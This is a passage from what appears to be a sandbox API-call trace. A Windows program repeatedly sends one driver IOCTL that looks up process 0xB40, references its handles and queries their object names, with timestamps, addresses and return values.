| out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.458] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0246.458] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.458] PsReleaseProcessExitSynchronization () returned 0x2 [0246.458] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.458] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.458] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0246.458] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.458] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.458] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.459] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0246.459] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.459] PsAcquireProcessExitSynchronization () returned 0x0 [0246.459] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.459] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800298b6a0, HandleInformation=0x0) returned 0x0 [0246.459] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.459] PsReleaseProcessExitSynchronization () returned 0x2 [0246.459] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.459] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.459] ObfDereferenceObject (Object=0xfffffa800298b6a0) returned 0x3 [0246.459] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.459] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.459] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.459] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0246.459] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.459] PsAcquireProcessExitSynchronization () returned 0x0 [0246.459] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.459] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00195b490, HandleInformation=0x0) returned 0x0 [0246.459] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.459] PsReleaseProcessExitSynchronization () returned 0x2 [0246.459] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.459] ObQueryNameString (in: Object=0xfffff8a00195b490, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.460] ObfDereferenceObject (Object=0xfffff8a00195b490) returned 0x2 [0246.460] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.460] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.460] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.460] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0246.460] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.460] PsAcquireProcessExitSynchronization () returned 0x0 [0246.460] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.460] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00150f740, HandleInformation=0x0) returned 0x0 [0246.460] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.460] PsReleaseProcessExitSynchronization () returned 0x2 [0246.460] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.460] ObQueryNameString (in: Object=0xfffff8a00150f740, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.460] ObfDereferenceObject (Object=0xfffff8a00150f740) returned 0x2 [0246.460] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.460] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.460] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.460] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0246.460] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.460] PsAcquireProcessExitSynchronization () returned 0x0 [0246.460] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.460] ObReferenceObjectByHandle (in: Handle=0x158, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b55980, HandleInformation=0x0) returned 0x0 [0246.461] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.461] PsReleaseProcessExitSynchronization () returned 0x2 [0246.461] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.461] ObQueryNameString (in: Object=0xfffff8a001b55980, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.461] ObfDereferenceObject (Object=0xfffff8a001b55980) returned 0x2 [0246.461] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.461] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.461] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.461] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x102, lpOverlapped=0x0) returned 1 [0246.461] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.461] PsAcquireProcessExitSynchronization () returned 0x0 [0246.461] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.461] ObReferenceObjectByHandle (in: Handle=0x160, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80019e9070, HandleInformation=0x0) returned 0x0 [0246.461] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.461] PsReleaseProcessExitSynchronization () returned 0x2 [0246.461] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.461] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.461] ObfDereferenceObject (Object=0xfffffa80019e9070) returned 0x1 [0246.461] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.461] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.461] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.461] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0246.462] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.462] PsAcquireProcessExitSynchronization () returned 0x0 [0246.462] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.462] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800385c5e0, HandleInformation=0x0) returned 0x0 [0246.462] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.462] PsReleaseProcessExitSynchronization () returned 0x2 [0246.462] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.462] ObQueryNameString (in: Object=0xfffffa800385c5e0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.462] ObfDereferenceObject (Object=0xfffffa800385c5e0) returned 0x1 [0246.462] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.462] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.462] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.462] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0246.462] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.462] PsAcquireProcessExitSynchronization () returned 0x0 [0246.462] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.462] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fbfc80, HandleInformation=0x0) returned 0x0 [0246.463] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.463] PsReleaseProcessExitSynchronization () returned 0x2 [0246.463] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.463] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.463] ObfDereferenceObject (Object=0xfffffa8001fbfc80) returned 0x1 [0246.463] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.463] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.463] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.463] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0246.463] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.463] PsAcquireProcessExitSynchronization () returned 0x0 [0246.463] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.463] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002072760, HandleInformation=0x0) returned 0x0 [0246.463] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.463] PsReleaseProcessExitSynchronization () returned 0x2 [0246.463] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.463] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.463] ObfDereferenceObject (Object=0xfffffa8002072760) returned 0x1 [0246.463] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.463] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.463] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.463] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0246.464] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.464] PsAcquireProcessExitSynchronization () returned 0x0 [0246.464] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.464] ObReferenceObjectByHandle (in: Handle=0x2e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002009740, HandleInformation=0x0) returned 0x0 [0246.464] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.464] PsReleaseProcessExitSynchronization () returned 0x2 [0246.464] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.464] ObQueryNameString (in: Object=0xfffffa8002009740, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.464] ObfDereferenceObject (Object=0xfffffa8002009740) returned 0x1 [0246.464] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.464] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.464] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.464] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb4, lpOverlapped=0x0) returned 1 [0246.464] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.464] PsAcquireProcessExitSynchronization () returned 0x0 [0246.464] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.464] ObReferenceObjectByHandle (in: Handle=0x324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b10320, HandleInformation=0x0) returned 0x0 [0246.465] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.465] PsReleaseProcessExitSynchronization () returned 0x2 [0246.465] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.465] ObQueryNameString (in: Object=0xfffff8a001b10320, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.465] ObfDereferenceObject (Object=0xfffff8a001b10320) returned 0x2 [0246.465] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.465] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.465] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.465] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb0, lpOverlapped=0x0) returned 1 [0246.465] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.465] PsAcquireProcessExitSynchronization () returned 0x0 [0246.465] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.465] ObReferenceObjectByHandle (in: Handle=0x330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001bde960, HandleInformation=0x0) returned 0x0 [0246.465] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.465] PsReleaseProcessExitSynchronization () returned 0x2 [0246.465] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.465] ObQueryNameString (in: Object=0xfffff8a001bde960, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.465] ObfDereferenceObject (Object=0xfffff8a001bde960) returned 0x2 [0246.465] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.465] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.465] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.465] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xae, lpOverlapped=0x0) returned 1 [0246.465] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.465] PsAcquireProcessExitSynchronization () returned 0x0 [0246.466] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.466] ObReferenceObjectByHandle (in: Handle=0x334, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80021681e0, HandleInformation=0x0) returned 0x0 [0246.466] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.466] PsReleaseProcessExitSynchronization () returned 0x2 [0246.466] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.466] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.466] ObfDereferenceObject (Object=0xfffffa80021681e0) returned 0x1 [0246.466] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.466] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.466] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.466] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xb4, lpOverlapped=0x0) returned 1 [0246.466] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.466] PsAcquireProcessExitSynchronization () returned 0x0 [0246.466] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.466] ObReferenceObjectByHandle (in: Handle=0x33c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b66540, HandleInformation=0x0) returned 0x0 [0246.466] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.466] PsReleaseProcessExitSynchronization () returned 0x2 [0246.466] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.466] ObQueryNameString (in: Object=0xfffff8a001b66540, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.466] ObfDereferenceObject (Object=0xfffff8a001b66540) returned 0x2 [0246.466] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.466] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.466] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.467] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0246.467] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.467] PsAcquireProcessExitSynchronization () returned 0x0 [0246.467] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.467] ObReferenceObjectByHandle (in: Handle=0x34c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fb3580, HandleInformation=0x0) returned 0x0 [0246.467] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.467] PsReleaseProcessExitSynchronization () returned 0x2 [0246.467] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.467] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.467] ObfDereferenceObject (Object=0xfffffa8001fb3580) returned 0x5 [0246.467] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.467] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.467] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.467] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0246.467] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.467] PsAcquireProcessExitSynchronization () returned 0x0 [0246.467] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.467] ObReferenceObjectByHandle (in: Handle=0x35c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001c4e8c0, HandleInformation=0x0) returned 0x0 [0246.467] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.467] PsReleaseProcessExitSynchronization () returned 0x2 [0246.467] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.467] ObQueryNameString (in: 